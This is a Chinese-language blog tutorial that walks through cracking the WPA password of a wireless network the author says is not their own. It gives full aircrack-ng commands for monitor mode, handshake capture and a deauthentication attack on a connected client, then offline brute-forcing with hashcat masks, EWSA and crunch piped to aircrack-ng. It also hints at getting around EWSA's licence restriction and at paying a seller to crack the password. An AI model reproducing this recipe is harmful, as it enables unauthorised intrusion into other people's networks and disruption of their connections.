无线网络渗透

好吧,第一篇文章就献给无线网络渗透吧!

准备

环境: Mac + VMware + Kali2.0
设备: 拓实N815 300M大功率网卡

开始

前期准备

现在vm上加载网卡到kali里,访问kali里,查看网卡(这里列出两种方法)

1. iwconfig

2. airmon-ng

当看到有wlan字眼的时候,说明网卡是加载成功
那么接下来这不可有可无(虽然我看到很多人都会执行一次,但是根据实际情况来说,你是第一次启动的时候是不需要的,需要这步的时候,是在你已经运行过服务后才需要到这一步)

airmon-ng check kill #清除所有aircrack套件的进程

然后把网卡改成是监听模式

airmon-ng start wlan0

这里的wlan0请根据你的网卡信息修改
显示:

开始扫描

airodump-ng wlan0mon

这样你的网卡就会扫描附近的无线信号了,在这里需要注意的是,上面一栏是开放的无线信号,下面一栏是这个无线信号有哪个机器正在连接这个无线

那在这里,随便挑一个吧,(因为看到这个不是自己的无线….)

B8:F8:00:00:00:04

开始抓包

airodump-ng --bssid B8:F8:00:00:00:04 -c 1 -w TP-wap-01 wlan0mon
--bssid # 这个参数是指对方的无线ssid
-c # 这个无线信号的信道
-w # 握手包的文件名称,保存在你命令执行的当前目录下,比如说你在/root/下执行,那么文件就会再/root/下.

执行完后,要等待几十秒时间,来观察一下这个无线连接的设备是否稳定在线(通常我都是等待十秒)

开始攻击

在攻击的时候需要另外开一个窗口,因为抓包的窗口需要监控是否有抓到包

aireplay-ng --deauth 15 -a B8:F8:00:00:00:04 -c 24:5B:00:00:00:77 wlan0mon

攻击无线热点,这样才可以促使服务端(无线热点)和客户端(连接设备)因为中断而重新连接而的到握手包,

通常情况下的话,只需要发送15个包基本上是可以了,然后等待一下.看有没有

看到没有!!!!看到没有!!!抓到包了,
WPA handshake: B8:F8:00:00:00:04
这个就是握手包信息,已经抓到了

开始猜解密码

通常情况下,抓到握手包的时候,都会用aircrack-ng自带的密码爆破去获取密码,但是这种方式需要很强大的字典,记住,强大!!!没有几个PB,真的不敢用.
在这里,我将用几种方式去跑密码

  1. 通过hashcat
  2. 通过ewsa
  3. 通过crunch重定向到aircrack-ng

密码破解

环境: Windows7 64位 + RX480 8G + 64G内存
工具: hashcat3.0(windows) / ewsa7.0(windows) / crunch+aircrack-ng(kali)

通过hashcat

首先,要先整理数据.

wpaclean wpapass.cap TP-wap-01.cap


但看到这种情况的时候,说明这个包成功识别了并且是成功的握手包

然后再把握手包转换成hashcat能识别的hash类型

aircrack-ng TP-wap-01.cap -J TP-wap-hash

执行完后,会在当前目录下生成一个hccap后缀的文件,这个就是我们需要用到的.
然后放到hashcat下进行猜解

这里需要说明一下,不要下载最新的hashcat,因为最新版本的貌似剔除了wap密码爆破的功能了.所有要找找旧版的,我这里的版本是3.0的

hashcat64.exe -m 2500 -a 3 TP-wap-hash.hccap ?d?d?d?d?d?d?d?d

命令解说:

* -m # hash类型选项
* 2500 # wap/wap2类型
* -a # 攻击类型
* 3 # 掩码暴力破解
* ?d # 自定义字符集,这里是选的是八位数的数字,就是从 00000000 - 99999999 这里的数字集里进行密码爆破

hash类型有很多,这里就不一一描述了,可以通过–help进行查看
攻击类型的话,这里列举常用的三种

  • 0 = Straight #直接字典破解
  • 1 = Combination #组合破解
  • 3 = Brute-force #掩码暴力破解

字符集的话有这几种

- ?l = abcdefghijklmnopqrstuvwxyz
- ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
- ?d = 0123456789
- ?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
- ?a = ?l?u?d?s

好了,hashcat的目前就讲到这里,我的也跑完了,很遗憾,并没有跑出来.九分钟跑完

看来,密码还是很复杂的样子….
不要问我为什么加大位数,我也想啊…我想起来有可能是十一位的手机号码,但是跑一个密码需要6天啊,还不如找淘宝15块钱解决,你说是不是呢!?
英文我就不说了…简直可怕,都是按月算的…

通过ewsa

EWSA全称Elcomsoft Wireless Security Auditor。ElcomSoft是一家俄罗斯软件公司,出品过不少密码找回软件,涉及Office、SQL、PDF、EFS等等
废话不多,直接开搞.

这里工具会简单一点,因为这个是界面化的,而且还有中文…我就粗略写一下了.
我这边用的是7.0版本的,非破解版.非破解版有个不好的地方就是,如果跑出密码了,你是看不到的,需要购买正版以后才能查看,但是!!!山人自有妙计!

好了,第一次打开界面的时候,是英文的,设置中文的话,再Options->Language下选择ewsa_chinese_simplified就可以了.
然后这里导入数据,点击Import Hashcat dump,选择刚才的包TP-wap-hash.hccap.

成功加载.
然后选择破解选项,这里有也几种破解的,然后我发现,这里破解其实也是看字典的.牛逼字典才是王道啊….
我再往上下载了几十G的字典拿来尝试一下.


大概需要半个小时吧!

通过crunch+aircrack-ng

crunch这个是一个字典生成工具,为什么用它呢,难倒要先生成字典后再去跑么?非也非也.看中这款工具也是因为这个工具可以进行重定向功能,这样就不会产生大量的字典文件了.
不说了,就是干!

crunch 8 8 abcdefghijklmnopqrstuvwxyz | aircrack-ng --bssid B8:F8:00:00:00:04 -w - TP-wap-01.cap
8 8 abcdefghijklmnopqrstuvwxyz # 以字符26个小写英文字母生成最小8位数,最大8位数的字符列表

恩…..

我想…应该….会很快吧….

Crunch will now generate the following amount of data: 1879443581184 bytes
1792377 MB
1750 GB
1 TB
0 PB
Crunch will now generate the following number of lines: 208827064576

很…会很快的…

会很快被我暂停掉的!!!!!!

最后我决定,丢给淘宝…